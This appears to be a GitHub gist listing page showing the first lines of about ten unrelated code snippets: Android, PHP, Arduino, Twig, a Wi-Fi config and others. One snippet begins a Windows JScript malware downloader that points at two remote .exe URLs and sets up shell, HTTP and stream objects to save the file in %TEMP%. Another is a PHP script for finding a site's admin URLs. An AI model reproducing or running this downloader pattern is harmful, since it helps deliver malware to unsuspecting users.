This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include "blocker.h" | |
| namespace VPZ | |
| { | |
| namespace Security | |
| { | |
| Blocker::Blocker(IntPtr Handle) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package com.vaibhavpandey.utility; | |
| import com.vaibhavpandey.demo.BuildConfig; | |
| import android.text.TextUtils; | |
| import android.util.Log; | |
| public final class Lograt { | |
| /** |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| /** | |
| * Simple script to find possible admin URLs for a given domain | |
| * Replace [ .* ] with array( .* ) if running PHP < 5.4 (if found) | |
| * By Vaibhav Pandey <contact@vaibhavpandey.com> | |
| */ | |
| define('REGEX_DOMAIN', '/^(([a-zA-Z]{1})|([a-zA-Z]{1}[a-zA-Z]{1})|([a-zA-Z]{1}[0-9]{1})|([0-9]{1}[a-zA-Z]{1})|([a-zA-Z0-9][a-zA-Z0-9-_]{1,61}[a-zA-Z0-9]))\.([a-zA-Z]{2,6}|[a-zA-Z0-9-]{2,30}\.[a-zA-Z]{2,3})$/'); | |
| function __code($uri) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (function() { | |
| var urls = [ | |
| 'http://wherareyoufromff.com/25.exe', | |
| 'http://arendroukysdqq.com/25.exe' | |
| ]; | |
| var shell = WScript.CreateObject('WScript.Shell'); | |
| var xmlhttp = WScript.CreateObject('MSXML2.XMLHTTP'); | |
| var stream = WScript.CreateObject('ADODB.Stream'); | |
| var tmp = shell.ExpandEnvironmentStrings('%TEMP%\\'); | |
| var file = tmp + 4194304 + '.exe'; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| namespace App\Twig; | |
| use Symfony\Component\HttpFoundation\RequestStack; | |
| use Twig\Extension\AbstractExtension; | |
| use Twig\TwigFunction; | |
| class ActiveExtension extends AbstractExtension | |
| { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const e = str => { | |
| const replacements = { | |
| '&': '&', | |
| '<': '<', | |
| '>': '>', | |
| "'": ''', | |
| '"': '"', | |
| }; | |
| return str.replace(/[&<>"']/g, match => replacements[match]) | |
| }; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| int BLINK_SPEED_MS = 250; | |
| int PIN_N = 15; | |
| void setup() { | |
| // put your setup code here, to run once: | |
| pinMode(PIN_N, OUTPUT); | |
| } | |
| void loop() { | |
| // put your main code here, to run repeatedly: |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <ESP8266WiFi.h> | |
| int PIN_N = 15; // pin on which LED is connected | |
| int PIN_MODE = LOW; | |
| int SERIAL_BAUD = 115200; | |
| const char* WIFI_SSID = "ESP8266"; // your WiFi SSID | |
| const char* WIFI_PASSWORD = "nodemcutest"; // your WiFi password |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev | |
| update_config=1 | |
| country=IN | |
| network={ | |
| ssid="VPZ" | |
| psk="SecretWifiPassword" | |
| key_mgmt=WPA-PSK | |
| } |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| sudo nano /lib/systemd/system/bluetooth.service | |
| ## Changes >> | |
| ExecStart=/usr/lib/bluetooth/bluetoothd | |
| ## --- TO --- | |
| ExecStart=/usr/lib/bluetooth/bluetoothd --experimental | |
| ## << Changes |
OlderNewer